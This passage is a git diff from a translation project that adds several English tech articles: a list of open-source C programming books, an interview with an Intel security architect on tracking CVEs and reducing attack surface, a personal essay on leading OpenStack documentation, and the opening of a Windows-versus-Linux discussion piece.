group. He is the author of the Open Source Lab. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/grad-school-open-source-academic-lab + +作者:[Joshua Pearce][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jmpearce +[1]:https://opensource.com/article/17/1/grad-school-open-source-academic-lab?rate=aJZB6TNyQIo2EOgqPxN8P9a5aoiYgLhtP9GujsPCJYk +[2]:http://www.wired.com/2014/07/openhatch/ +[3]:http://www.indeed.com/salary?q1=linux&q2=microsoft+windows +[4]:http://www.appropedia.org/MOST_application_process#Undergraduates +[5]:http://spectrum.ieee.org/at-work/tech-careers/where-the-jobs-are-2014 +[6]:https://www.asme.org/career-education/articles/early-career-engineers/engineering-salaries-on-the-rise +[7]:http://web.mit.edu/registrar/reg/costs/ +[8]:http://www.mtu.edu/alumni/favorites/snowfall/ +[9]:http://www.mtu.edu/gradschool/admissions/financial/cost/ +[10]:http://www.portalprogramas.com/en/how-to/best-american-universities-open-source-2014.html +[11]:http://www.rit.edu/news/story.php?id=50590 +[12]:http://www.mtu.edu/enterprise/teams/ +[13]:https://ocw.mit.edu/index.htm +[14]:http://www.networkworld.com/article/3062660/open-source-tools/6-colleges-turning-out-open-source-talent.html +[15]:https://en.wikipedia.org/wiki/Open_Source_Lab +[16]:http://www.appropedia.org/Open-source_Lab#Examples +[17]:http://openhardware.science/ +[18]:https://hbr.org/2016/08/what-if-all-u-s-coal-workers-were-retrained-to-work-in-solar +[19]:http://www.oshwa.org/ +[20]:http://reprap.org/ +[21]:http://www.appropedia.org/MOST +[22]:http://openwetware.org/wiki/Main_Page +[23]:https://www.debian.org/ +[24]:http://www.appropedia.org/Engineers_Without_Borders +[25]:http://www.appropedia.org/Hackerspace +[26]:http://www.cbpp.org/research/state-by-state-fact-sheets-higher-education-cuts-jeopardize-students-and-states-economic +[27]:https://opensource.com/user/26164/feed +[28]:https://opensource.com/article/17/1/grad-school-open-source-academic-lab#comments +[29]:https://opensource.com/users/jmpearce diff --git a/sources/talk/20170206 LEARN C PROGRAMMING WITH 9 EXCELLENT OPEN SOURCE BOOKS.md b/sources/talk/20170206 LEARN C PROGRAMMING WITH 9 EXCELLENT OPEN SOURCE BOOKS.md new file mode 100644 index 0000000000..26d4425521 --- /dev/null +++ b/sources/talk/20170206 LEARN C PROGRAMMING WITH 9 EXCELLENT OPEN SOURCE BOOKS.md @@ -0,0 +1,262 @@ +LEARN C PROGRAMMING WITH 9 EXCELLENT OPEN SOURCE BOOKS +============================================================ + +Books are very personal things. And programming books are no exception. We all form bonds with programming books that help master the rudiments of a language, and then be able to move on to fully exploit the language’s flexibility. + +I have carefully considered the open source C books that are closest to my heart. I have identified 9 books that mean the most to me. + +C is a general-purpose, procedural, portable, high-level programming language that is one of the most popular and influential languages. It was designed to be compiled using a straightforward compiler, to provide low-level access to memory, to provide language constructs that map efficiently to machine instructions, and to require minimal run-time support. Many programming languages owe a considerable debt to C. It has become something of the lingua franca in the programming world. + +C is fairly simple to understand. It allows the programmer to organize programs in a clear, easy, logical way. It is a very flexible, practical and compact language combined with an easy to read syntax. Code written in C runs quickly, with easy access to the low level facilities in the computer. Compiler directives make it possible to produce a single version of a program compiled for different architectures. + +C is about freedom. It therefore makes sense to learn C with books that also embody freedom. Take a look at my open source picks and see if any of them grab your fancy. Put the kettle on and enjoy. + +| + ![The C Book](https://i1.wp.com/www.ossblog.org/wp-content/uploads/2017/01/TheCBook.png?resize=200%2C290&ssl=1) + | + +### [The C Book][3] + +By Mike Banahan, Declan Brady and Mark Doran (350 pages) + +The C Book is designed for programmers who already have some experience of using a modern high-level procedural programming language. The book concentrates on the things that are special to C. In particular, it is the way that C is used which is focused on. + +Chapters include: + +* An Introduction to C +* Variables and Arithmetic – introduces some of the fundamentals of C, including keywords and identifiers, declaration of variables, real types, integral types, expressions and arithmetic, and constants +* Control of Flow and Logical Expressions – looks at the various ways that the control of flow statements can be used in a C program, including some statements that have not been introduced so far. Control of flow, more logical expressions, and strange operators +* Functions – the type of functions, recursion and argument passing, and linkage +* Arrays and Pointers – arrays, pointers, character handling, sizeof and storage allocation, pointers to functions, expressions involving pointers, arrays, the & operator and function declarations +* Structured Data Types – structures, unions, bitfields, enums, qualifiers and derived types, and initialization +* The Preprocessor – how the preprocessor works, and directives +* Specialized Areas of C – declarations, definitions and accessibility, typedef, const and volatile, and sequence points +* Libraries – diagnostics, character handling, localization, limits, mathematical functions, non-local jumps, signal handling, variable numbers of arguments, input and output, formatted I/O, character I/O, unformatted I/O, random access functions, general utilities, string handling, and date and time +* Complete Programs in C – putting it all together, arguments to main, interpreting program arguments, a pattern matching program, and a more ambitious example + +The authors give the reader permission to do anything they want with the book provided there is an acknowledgement of the authors and their copyright. From what Mike Banahan has confirmed, the book is effectively under the Creative Commons License. + + | +| + ![C Elements of Style](https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/01/CElementsofStyle.jpg?resize=200%2C255&ssl=1) + | + +### [C Elements of Style][4] + +By Steve Oualline (265 pages) + +C Elements of Style is a useful guide which covers the principals of good programming style, teaching C and C++ programmers how to write code that can be easily read, understood, and maintained by others. Whether you are a student or professional programmer, you will benefit from the many tips and techniques for constructing elegant, reliable code. + +The book attempts to show readers how to build a good programming style into your code. Since computer reads only the code and the human concentrates on the comments, a good programming style pertains to both parts of a program. + +The ultimate goal is to build a well-designed, well-written code which not only make an effective use of the computer and but also contains careful constructed comments to help humans understand it. This condition will ease the debugging, maintenance and enhancement process, which will eventually improve the readability, portability, reliability and maintainability of your code. + +Inside, you will find guidelines on writing comments, program heading, determining variable names, statement formatting, statement details, writing preprocessor, organizing directories and creating makefile. + +This book is published under the Creative Commons License. + + | +| + ![Build Your Own Lisp](https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/02/BuildYourOwnLisp.jpeg?resize=200%2C299&ssl=1) + | + +### [Build Your Own Lisp][5] + +By Daniel Holden (212 pages) + +Learn the C programming language and at the same time learn how to build your very own programming language, a minimal Lisp, in under 1000 lines of code. + +This book is for anyone wanting to learn C, or who has once wondered how to build their own programming language. It is not designed as a first programming language book, as you need some programming experience to make your way through the content. + +Build Your Own Lisp is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 3.0. + +A paperback is available to purchase from Amazon. + + | +| + ![](https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/02/GNUCReferenceManual.png?resize=200%2C279&ssl=1) + | + +### [The GNU C Reference Manual][6] + +By Trevis Rothwell, James Youngman (91 pages) + +The GNU C Reference Manual is a reference for the C programming language and aims to document the 1989 ANSI C standard, the 1999 ISO C standard, and the current state of GNU extensions to standard C. It is not designed for new programmers. + +Chapters cover: + +* Lexical Elements – describes the lexical elements that make up C source code after preprocessing. These elements are called tokens. There are five types of tokens: keywords, identifiers, constants, operators, and separators +* Data Types – examines primitive data types, enumerations, unions, structures, arrays, pointers, incomplete types, type qualifiers, storage class specifiers, and renaming types +* Expressions and Operators – also looks at incrementing / decrementing, arithmetic operators, complex conjugation, comparison operators, logical operators, bit shifting, bitwise local operators, pointer operators, the sizeof operator, type casts, and more +* Statements – read about labels, expression statements, the if statement, the switch statement, the while statement, the do statement, the for statement, blocks, the null statement, the goto statement, the break statement, the continue statement, the return statement, and the typedef statement +* Functions – learn about function declarations, function definitions, calling functions, function parameters, variable length parameter lists, calling functions through function pointers, the main function, recursive functions, and more +* Program Structure and Scope – looks at the big picture +* A Sample Program – a complete program written in C, consisting of both a C source file and a header file. This program is an expanded version of the quintessential “hello world” program, and serves as an example of how to format and structure C code for use in programs for FSF Project GNU + +The book is available under the terms of the GNU Free Documentation License, Version 1.3 or later. + + | +| + ![](https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/02/GNUCProgrammingTutorial.png?resize=475%2C637&ssl=1) + | + +### [The GNU C Programming Tutorial][7] + +By Mark Burgess, Ron Hale-Evans (290 pages) + +The GNU C Programming Tutorial introduces the reader to the basic ideas in a logical order. It offers detailed coverage of each of the main elements of the C language and how to program in C, with special emphasis on the GNU/Linux compiler and associated software. + +There are chapters devoted to functions, variables and declarations, scope, expressions and operators, parameters, pointers, decisions, loops, arrays, strings, input and output, and much more. + +The GNU C Programming Tutorial is released under the GNU Free Documentation License, Version 1.1. + + | +| + ![](https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/02/EssentialC.png?resize=200%2C270&ssl=1) + | + +### [Essential C][1] + +By Nick Parlante (45 pages) + +This Stanford CS Education is a fairly brief document which explains all the common features and techniques for C. The coverage is pretty quick, so it is targeted at a programmer with a background in another language. + +Topics include variables, int types, floating point types, promotion, truncation, operators, control structures (if, while, for), functions, value parameters, reference parameters, structs, pointers, arrays, the pre-processor, and the standard C library functions. + +Table of Contents: + +* Introduction +* Basic Types and Operators +* Control Structures +* Complex Data Types +* Functions +* Odds and Ends +* Advanced Arrays and Pointers +* Operators and Standard Library Reference + +The author’s description indicates this book is issued under an open-source like license. + + | +| + ![](https://i1.wp.com/www.ossblog.org/wp-content/uploads/2017/02/BeejsGuideCProgramming.png?resize=200%2C273&ssl=1) + | + +### [Beej’s Guide to C Programming][8] + +By Brian “Beej” Hall (130 pages) + +Beej’s Guide to C Programming tries to lead the reader from complete and utter sheer lost confusion on to the sort of enlightened bliss that can only be obtained though pure C programming. + +Chapters: + +* Programming Building Blocks +* Variables, Expressions, and Statements – A variable is simply a name for a number. An expression in C consists of other expressions optionally put together with operators. Examines the if, while, do-while, and the for statements +* Building Blocks Revisited +* Functions – put some of those building blocks in their own functions when they become too large, or when they do a different thing than the rest of the code +* Variables, the Sequel – talks about variable scope and storage classes +* Pointers – they are the address of data. Just like an int can be 12, a pointer can be the address of data +* Structures – a construct that allows you to logically group variables into groups. You can then reference the group as a whole +* Arrays – a linear collection of related data +* Strings – a string in C is a sequence of bytes in memory that usually contains a bunch of letters +* Dynamic Memory – explores the malloc(), free(), realloc(), and calloc() functions +* More Stuff – topics include pointer arithmetic, typedef, enum, struct declarations, command line arguments, multidimensional arrays, casting and promotion, incomplete types, void pointers, NULL pointers, and static keywords +* Standard I/O Library – used for reading from and writing to files +* String Manipulation – find functions for pulling substrings out of strings, concatenating strings together, getting the length of a string, and more +* Mathematics – functions that will serve your general purpose mathematical needs + +This book is licensed under the Creative Commons Attribution-Noncommercial- No Derivative Works 3.0 License. + + | +| + ![](https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/02/ModernC.png?resize=200%2C270&ssl=1) + | + +### [Modern C][2] + +By Jens Gustedt (310 pages) + +Modern C seeks to motivate the reader to climb to higher levels of knowledge. The book is divided into five levels: + +* First level – provides the reader with the very basics of C programs, their purpose, their structure, and how to use them +* Second level – details most principal concepts and features such as control structures, data types, operators and functions. It aims to provide the reader with a deeper understanding of the things that are going on with running programs +* Third level – goes to the heart of the C language. It fully explains pointers, familiarizes you with C’s memory model, and allows you to understand most of C’s library interface. +* Fourth level – goes into detail in specific topics, such as performance, reentrancy, atomicity, threads and type generic programming +* Fifth level – discusses the author’s ideas for a future development of C + +This book is licensed under the Creative Commons Attribution-Noncommercial- No Derivative Works 3.0 License. + + | +| + ![An Introduction to GCC](https://i1.wp.com/www.ossblog.org/wp-content/uploads/2017/01/IntroductionGCC.png?resize=200%2C300&ssl=1) + | + +### [An Introduction to GCC][9] + +By Brian Gough (144 pages) + +An Introduction to GCC provides an introduction to the GNU C and C++ Compilers, gcc and g++, which are part of the GNU Compiler Collection (GCC). + +This book explains how to use the compiler itself. Based on years of observation of questions posted on mailing lists, it guides the reader straight to the important options of GCC. + +Chapters: + +* Introduction +* Compiling a C program – describes how to compile C programs using gcc. Programs can be compiled from a single source file or from multiple source files, and may use system libraries and header files +* Compilation options – describes other commonly-used compiler options available in GCC. These options control features such as the search paths used for locating libraries and include files, the use of additional warnings and diagnostics, preprocessor macros and C language dialects +* Using the preprocessor – describes the use of the GNU C preprocessor cpp, which is part of the GCC package. The preprocessor expands macros in source files before they are compiled. It is automatically called whenever GCC processes a C or C++ program +* Compiling for debugging – provides the -g debug option to store additional debugging information in object files and executables. This debugging information allows errors to be traced back from a specific machine instruction to the corresponding line in the original source file +* Compiling with optimization – GCC is an optimizing compiler. It provides a wide range of options which aim to increase the speed, or reduce the size, of the executable files it generates +* Compiling a C++ program – describes how to use GCC to compile programs written in C++, and the command-line options specific to that language +* Platform-specific options – describes some of the options available for common platforms: Intel and AMD x86 options, x86 extensions, x86 64-bit processors, DEC Alpha options, SPARC options, POWER/PowerPC options, Multi-architecture support, and floating-point issues +* Troubleshooting – GCC provides several help and diagnostic options to help troubleshoot problems with the compilation process +* Compiler-related tools – describes a number of tools which are useful in combination with GCC. These include the GNU archiver ar, for creating libraries, and the GNU profiling and coverage testing programs, gprof and gcov +* How the compiler works – describes in more detail how GCC transforms source files to an executable file. Compilation is a multi-stage process involving several tools, including the GNU Compiler itself (through the gcc or g++ frontends), the GNU Assembler as, and the GNU Linker ld. The complete set of tools used in the compilation process is referred to as a toolchain +* Examining compiled files – describes several useful tools for examining the contents of executable files and object files +* Common error messages – describes the most frequent error and warning messages produced by gcc and g++. Each case is accompanied by a description of the causes, an example and suggestions of possible solutions +* Getting help – if readers encounters a problem not covered by this introduction, there are several reference manuals which describe GCC and language-related topics in more detail + +This book is published under the GNU Free Documentation License + + | + +* * * + +Here are some informative C Books to download without charge, but which regrettably are not released under an open source license, or where license information is unclear. In no particular order: + +[Introduction to C Programming][14] – by Rob Miles +[The New Standard C: An Economic and Cultural Commentary][15] – by Derek M. Jones +[Object-Oriented Programming with ANSI-C][16] – by Axel-Tobias Schreiner +[Writing Bug-Free C Code][17] – by Jerry Jongenius + +And finally, my recommendation if you want to buy a canonical reference book is this title: [The C Programming Language][18]. Terse, not for beginners, but widely regarded as the classic C programming book. + + +-------------------------------------------------------------------------------- + +via: https://www.ossblog.org/learn-c-programming-with-9-excellent-open-source-books/ + +作者:[Steve Emms ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ossblog.org/author/steve/ +[1]:http://cslibrary.stanford.edu/101/EssentialC.pdf +[2]:http://icube-icps.unistra.fr/img_auth.php/d/db/ModernC.pdf +[3]:http://publications.gbdirect.co.uk/c_book/ +[4]:http://www.oualline.com/books.free/style/index.html +[5]:http://buildyourownlisp.com/ +[6]:https://www.gnu.org/software/gnu-c-manual/ +[7]:http://www.crasseux.com/books/ctut.pdf +[8]:http://beej.us/guide/bgc/ +[9]:http://www.network-theory.co.uk/docs/gccintro/ +[10]:https://www.ossblog.org/author/steve/ +[11]:https://www.ossblog.org/learn-c-programming-with-9-excellent-open-source-books/#comments +[12]:https://www.ossblog.org/category/books/ +[13]:https://www.ossblog.org/category/programming/ +[14]:http://www.tti.unipa.it/~ricrizzo/KS/Data/RMiles/contents.html +[15]:http://www.coding-guidelines.com/cbook/cbook1_2.pdf +[16]:http://www.cs.rit.edu/~ats/books/ooc.pdf +[17]:http://www.duckware.com/bugfreec/index.html +[18]:https://en.wikipedia.org/wiki/The_C_Programming_Language diff --git a/sources/talk/20170207 How to Manage the Security Vulnerabilities of Your Open Source Product.md b/sources/talk/20170207 How to Manage the Security Vulnerabilities of Your Open Source Product.md new file mode 100644 index 0000000000..3c9f5b82b1 --- /dev/null +++ b/sources/talk/20170207 How to Manage the Security Vulnerabilities of Your Open Source Product.md @@ -0,0 +1,73 @@ +How to Manage the Security Vulnerabilities of Your Open Source Product +============================================================ + + + ![software vulnerabilities](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-software-vulnerabilities.jpg?itok=D3joblgb "software vulnerabilities") +In his upcoming talk at ELC + OpenIoT Summit, Ryan Ware, Security Architect at Intel, will explain how you can navigate the flood of vulnerabilities and manage the security of your product.[Creative Commons Zero][2]Pixabay + +The security vulnerabilities that you need to consider when developing open source software can be overwhelming. Common Vulnerability Enumeration (CVE) IDs, zero-day, and other vulnerabilities are seemingly announced every day. With this flood of information, how can you stay up to date? + +“If you shipped a product that was built on top of Linux kernel 4.4.1, between the release of that kernel and now, there have been nine CVEs against that kernel version,” says Ryan Ware, Security Architect at Intel, in the Q&A below. “These all would affect your product despite the fact they were not known at the time you shipped.” + + + ![Ryan Ware](https://www.linux.com/sites/lcom/files/styles/floated_images/public/ryan-ware_01.jpg?itok=cy13TM9g "Ryan Ware") + +Ryan Ware, Security Architect at Intel[Used with permission][1] + +In his upcoming presentation at[ ELC][6] + [OpenIoT Summit,][7] Ryan Ware, Security Architect at Intel, will present strategies for how you can navigate these waters and successfully manage the security of your product. In this preview of his talk, Ware discusses the most common developer mistakes, strategies to stay on top of vulnerabilities, and more. + +**Linux.com: Let's start from the beginning. Can you tell readers briefly about the Common Vulnerabilities and Exposures (CVE), 0-day, and other vulnerabilities? What are they, and why are they important?** + +Ryan Ware: Excellent questions. Common Vulnerabilities and Exposures (CVE) is a database maintained by the MITRE Corporation (a not-for-profit organization) at the behest of the United States government. It’s currently funded under the US Department of Homeland Security.  It was created in 1999 to house information about all publicly known security vulnerabilities. Each of these vulnerabilities has its own identifier (a CVE-ID) and can be referenced by that. This is how the term CVE, which really applies to the whole database, has morphed into meaning an individual security vulnerability: a CVE. + +Many of the vulnerabilities that end up in the CVE database started out life as 0-day vulnerabilities. These are vulnerabilities that for whatever reason haven’t followed a more ordered disclosure process such as Responsible Disclosure. The key is that they’ve become public and exploitable without the software vendor being able to respond with a remediation of some type -- usually a software patch. These and other unpatched software vulnerabilities are critically important because until they are patched, the vulnerability is exploitable. In many ways, the release of a CVE or a 0-Day is like a starting gun going off.  Until you reach the end of the race, your customers are vulnerable. + +**Linux.com: How many are there? How do you determine which are pertinent to your product?** + +Ryan: Before going into how many, everyone shipping software of any kind needs to keep something in mind. Even if you take all possible efforts to ensure that the software you ship doesn’t have known vulnerabilities in it, your software *does* have vulnerabilities. They are just not known. For example, if you shipped a product that was built on top of Linux kernel 4.4.1, between the release of that kernel and now, there have been nine CVEs against that kernel version. These all would affect your product despite the fact they were not known at the time you shipped. + +At this point in time, the CVE database contains 80,957 entries (January 30, 2017) and includes entries going all the way back to 1999 when there were 894 documented issues. The largest number in a year to date was 2014 when 7,946 issues were documented. That said, I believe that the decrease in numbers over the last two years isn’t due to there being fewer security vulnerabilities. This is something I’ll touch on in my talk. + +**Linux.com: What are some strategies that developers can use to stay on top of all this information?** + +Ryan: There are various ways a developer can float on top of the flood of vulnerability information. One of my favorite tools for doing so is [CVE Details][8]. They present the information from MITRE in a very digestible way. The best feature they have is the ability to create custom RSS feeds so you can follow vulnerabilities for the components you care about. Those with more complex tracking problems may want to start by downloading the MITRE CVE database (freely available) and pulling regular updates. Other excellent tools, such as cvechecker, allow you to check for known vulnerabilities in your software. + +For key portions of your software stack, I also recommend one amazingly effective tool: Get involved with the upstream community. These are the people who understand the software you are shipping best. There are no better experts in the world. Work with them. + +**Linux.com: How can you know whether your product has all the vulnerabilities covered? Are there tools that you recommend?** + +Ryan: Unfortunately, as I said above, you will never have all vulnerabilities removed from your product. Some of the tools I mentioned above are key. However, there is one piece of software I haven’t mentioned yet that is absolutely critical to any product you ship: a software update mechanism. If you do not have the ability to update the product software out in the field, you have no ability to address security concerns when your customers are affected.  You must be able to update, and the easier the update process, the better your customers will be protected. + +**Linux.com: What else do developers need to know to successfully manage security vulnerabilities?** + +Ryan: There is one mistake that I see over and over. Developers always need to keep in mind the idea of minimizing their attackable surface area. What does this mean? In practice, it means only including the things in your product that your product actually needs! This not only includes ensuring you do not incorporate extraneous software packages into your product, but that you also compile projects with configurations that turn off features you don’t need. + +How does this help? Imagine it’s 2014\. You’ve just gone into work to see that the tech news is all Heartbleed all the time. You know you include OpenSSL in your product because you need to do some basic cryptographic functionality but you don’t use TLS heartbeat, the feature with the vulnerability in question. Would you rather: + +a. Spend the rest of your work working with customers and partners handholding them through a critical software update fixing a highly visible security issue? + +b. Be able to tell customers and partners simply that you compiled your products OpenSSL with the “–DOPENSSL_NO_HEARTBEATS” flag and they aren’t vulnerable, allowing you to focus on new features and other productive activities. + +The easiest vulnerability to address is the one you don’t include. + +_Embedded Linux Conference + OpenIoT Summit North America will be held on February 21-23, 2017 in Portland, Oregon. [Check out over 130 sessions][5] on the Linux kernel, embedded development & systems, and the latest on the open Internet of Things._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/event/elcna/2017/2/how-manage-security-vulnerabilities-your-open-source-product + +作者:[AMBER ANKERHOLZ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/aankerholz +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/creative-commons-zero +[3]:https://www.linux.com/files/images/ryan-ware01jpg +[4]:https://www.linux.com/files/images/security-software-vulnerabilitiesjpg +[5]:http://events.linuxfoundation.org/events/embedded-linux-conference/program/schedule?utm_source=linux&utm_campaign=elc17&utm_medium=blog&utm_content=video-blog +[6]:http://events.linuxfoundation.org/events/embedded-linux-conference +[7]:http://events.linuxfoundation.org/events/openiot-summit +[8]:http://www.cvedetails.com/ diff --git a/sources/talk/20170210 How I became a project team leader in open source.md b/sources/talk/20170210 How I became a project team leader in open source.md new file mode 100644 index 0000000000..1825da6448 --- /dev/null +++ b/sources/talk/20170210 How I became a project team leader in open source.md @@ -0,0 +1,64 @@ +How I became a project team leader in open source +============================================================ + ![How I became a project team leader in open source](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUSINESS_leadership_brand.png?itok=XSHoZZoG "How I became a project team leader in open source") + +Image by :  + +opensource.com + +> _The only people to whose opinions I listen now with any respect are people much younger than myself. They seem in front of me. Life has revealed to them her latest wonder. _― [Oscar Wilde][1], [The Picture of Dorian Gray][2] + +2017 marks two decades since I was first introduced to the concept of "open source" (though the term wasn't coined until later), and a decade since I made my first open source documentation contribution. Each year since has marked another milestone on that journey: new projects, new toolchains, becoming a core contributor, new languages, and becoming a Program Technical Lead (PTL). + +2017 is also the year I will take a step back, take a deep breath, and consciously give the limelight to others. + +As an idealistic young university undergraduate I hung around with the nerds in the computer science department. I was studying arts and, later, business, but somehow I recognized even then that these were my people. I'm forever grateful to a young man (his name was Michael, as so many people in my story are) who introduced me first to IRC and, gradually, to Linux, Google (the lesser known search engine at the time), HTML, and the wonders of open source. He and I were the first people I knew to use USB storage drives, and oh how we loved explaining what they were to the curious in the campus computer lab. + +After university, I found myself working for a startup in Canberra, Australia. Although the startup eventually failed to... well, start, I learned some valuable skills from another dear friend, David. I already knew I had a passion for writing, but David showed me how I could use that skill to build a career, and gave me the tools I needed to actually make that happen. He is also responsible for my first true language love: [LaTeX][3]. To this day, I can spot a LaTeX document from forty paces, which has prompted many an awkward conversation with the often-unwitting bearer of the document in question. + +In 2007, I began working for Red Hat, in what was then known as Engineering Content Services. It was a heady time. Red Hat was determined to invest in an in-house documentation and translation team, and another man by the name of Michael was determined that this would happen in Brisbane, Australia. It was extraordinary case of right place, right time. I seized the opportunity and, working alongside people I still count among the best and brightest technical writers I know, we set about making that thing happen. + +Working at Red Hat in those early days were some of the craziest and most challenging of my career so far. We grew rapidly, there were always several new hires waiting for us to throw them in the deep end, and we had the determination and tenacity to try new things constantly. _Release early, release often_ became a central tenet of our group, and we came up with some truly revolutionary ways of delivering content, as well as some appallingly bad ones. It was here that I discovered the beauty of data typing, single sourcing, remixing content, and using metadata to drive content curation. We weren't trying to tell stories to our readers, but to give our readers the tools to create their own stories. + +As the Red Hat team matured, so too did my career, and I eventually led a team of writers. Around the same time, I started attending and speaking at tech conferences, spreading the word about these new ways of developing content, and trying to lead developers into looking at documentation in new ways. I had a thirst for sharing this knowledge and passion for technical documentation with the world, and with the Red Hat content team slowing their growth and maturing, I found myself craving the fast pace of days gone by. It was time to find a new project. + +When I joined [Rackspace][4], [OpenStack][5] was starting to really hit its stride. I was on the organizing team for [linux.conf.au][6] in 2013 (ably led by yet another Michael), which became known affectionately as openstack.conf.au due to the sheer amount of OpenStack content that was delivered in that year. Anne Gentle had formed the OpenStack documentation team only a year earlier, and I had been watching with interest. The opportunity to work alongside Anne on such an exciting project was irresistible, so by the time 2013 drew to a close, Michael had hired me, and I had become a Racker and a Stacker. + +In late 2014, as we were preparing the Kilo release, Anne asked if I would be willing to put my name forward as a candidate for documentation PTL. OpenStack works on a democratic system where individuals self-nominate for the lead, and the active contributors to each project vote when there is more than one candidate. The fact that Anne not only asked me to step up, but also thought I was capable of stepping in her footsteps was an incredible honor. In early 2015, I was elected unopposed to lead the documentation team for the Liberty release, and we were off to Vancouver. + +By 2015, I had managed documentation teams sized between three and 13 staff members, across many time zones, for nearly five years. I had a business management degree and an MBA to my name, had run my own business, seen a tech startup fail, and watched a new documentation team flourish. I felt as though I understood what being a manager was all about, and I guess I did, but I realized I didn't know what being a PTL was all about. All of a sudden, I had a team where I couldn't name each individual, couldn't rely on any one person to come to work on any given day, couldn't delegate tasks with any authority, and couldn't compensate team members for good work. Suddenly, the only tool I had in my arsenal to get work done was my own ability to convince people that they should. + +My first release as documentation PTL was basically me stumbling around in the dark and poking at the things I encountered. I relied heavily on the expertise of the existing members of the group, particularly Anne Gentle and Andreas Jaeger (our documentation infrastructure guru), to work out what needed to be done, and I gradually started to document the things I learned along the way. I learned that the key to getting things done in a community was not just to talk and delegate, but to listen and collaborate. I had not only to tell people what to do, but also convince them that it was a good idea, and help them to see the task through, picking up the pieces if they didn't. + +Gradually, and through trial and error, I built the confidence and relationships to get through an OpenStack release successfully with my team and my sanity intact. This wouldn't have happened if the team hadn't been willing to stick by me through the times I was wandering in the woods, and the project would never have gotten off the ground in the first place without the advice and expertise of those that had gone before me. Shoulders of giants, etc. + +Somewhat ironically, technical writers aren't very good at documenting their own team processes, so we've been codifying our practices, conventions, tools, and systems. We still have much work to do on this front, but we have made a good start. As the OpenStack documentation team has matured, we have accrued our fair share of [tech debt][7], so dealing with that has been a consistent ribbon through my tenure, not just by closing old bugs (not that there hasn't been a lot of that), but also by changing our systems to prevent it building up in the first place. + +I am now in my tenth year as an open source contributor, and I have four OpenStack releases under my belt: Liberty, Mitaka, Newton, and Ocata. I have been a PTL for two years, and I have seen a lot of great documentation contributors come and go from our little community. I have made an effort to give those who are interested an opportunity to lead: through specialty teams looking after a book or two, release managers who perform the critical tasks to get each new release out into the wild, and moderators who lead a session at OpenStack Summit planning meetings (and help save my voice which, somewhat notoriously, is always completely gone by the end of Summit week). + +From these humble roles, the team has grown leaders. In these people, I see myself. They are hungry for change, full of ideas and ideals, and ready to implement crazy schemes and see where it takes them. So, this year, I'm going to take that step back, allow someone else to lead this amazing team, and let the team take their own steps forward. I intend to be here, holding on for the ride. I can't wait to see what happens next. + +-------------------------------------------------------------------------------- + +作者简介: + +Lana Brindley - Lana Brindley has several university degrees, a few of which are even relevant to her field. She has been playing and working with technology since she discovered the Hitchhikers’ Guide to the Galaxy text adventure game in the 80’s. Eventually, she worked out a way to get paid for her two passions – writing and playing with gadgetry – and has been a technical writer ever since. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/my-open-source-story-leader + +作者:[Lana Brindley][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/loquacities +[1]:http://www.goodreads.com/author/show/3565.Oscar_Wilde +[2]:http://www.goodreads.com/work/quotes/1858012 +[3]:https://www.latex-project.org/ +[4]:https://www.rackspace.com/en-us +[5]:https://www.openstack.org/ +[6]:https://linux.conf.au/ +[7]:https://en.wikipedia.org/wiki/Technical_debt diff --git a/sources/talk/20170211 Lets Chat Windows vs. Linux.md b/sources/talk/20170211 Lets Chat Windows vs. Linux.md new file mode 100644 index 0000000000..7c2607a9b6 --- /dev/null +++ b/sources/talk/20170211 Lets Chat Windows vs. Linux.md @@ -0,0 +1,41 @@ +Let’s Chat: Windows vs. Linux +============================================================ + +### Windows users, should you stay or should you go? + +Windows continues to be the top operating system on the desktop, with market share analysts putting it at more than 90 percent share, followed by macOS and Linux. + +And while Linux is only the second alternative to Windows according to these stats, it’s no secret that the last few years brought a substantial increase, with many more users choosing to switch to Ubuntu, Linux Mint, or another distro than before. + +The Windows 10 launch sparked more criticism against Microsoft, and the company’s aggressive upgrade campaign certainly didn’t help. There were users complaining that Windows 10 installed on their systems even though they didn’t specifically ask for it, and part of them decided to give up on Microsoft products entirely and switch to Linux. + +There were also claims that Microsoft was using Windows 10 to spy on its users, and once again, all this criticism pushed more users to the Linux side. + +More than a decade ago, the main reason for users to jump ship and embrace Linux was security, as Windows was the preferred target of malware writers and hackers across the world. + +And it all happened for a reason: Windows was the number one operating system and although it was so widely adopted, Microsoft’s security efforts lacked the efficiency that the company is aiming for these days. + +In the last few years, however, the security gap between Linux and Windows doesn’t appear to be so significant, and those users who decide to switch camps seem to have other reasons than security. + +We’re not going to present any market share statistics because they’re more or less irrelevant in this long-distance rivalry between Windows and Linux, and users’ voice is a lot more important, mostly because they could represent a better signal of what’s to come for the two platforms. + +And that’s why we’re asking you: is Linux the right alternative to Windows? Is giving up on Windows for Linux a good decision given Microsoft’s recent updates to the operating system? Should Microsoft be worried about the transition of some users to Linux? Express your thoughts in the comment box below. + +-------------------------------------------------------------------------------- + +via: 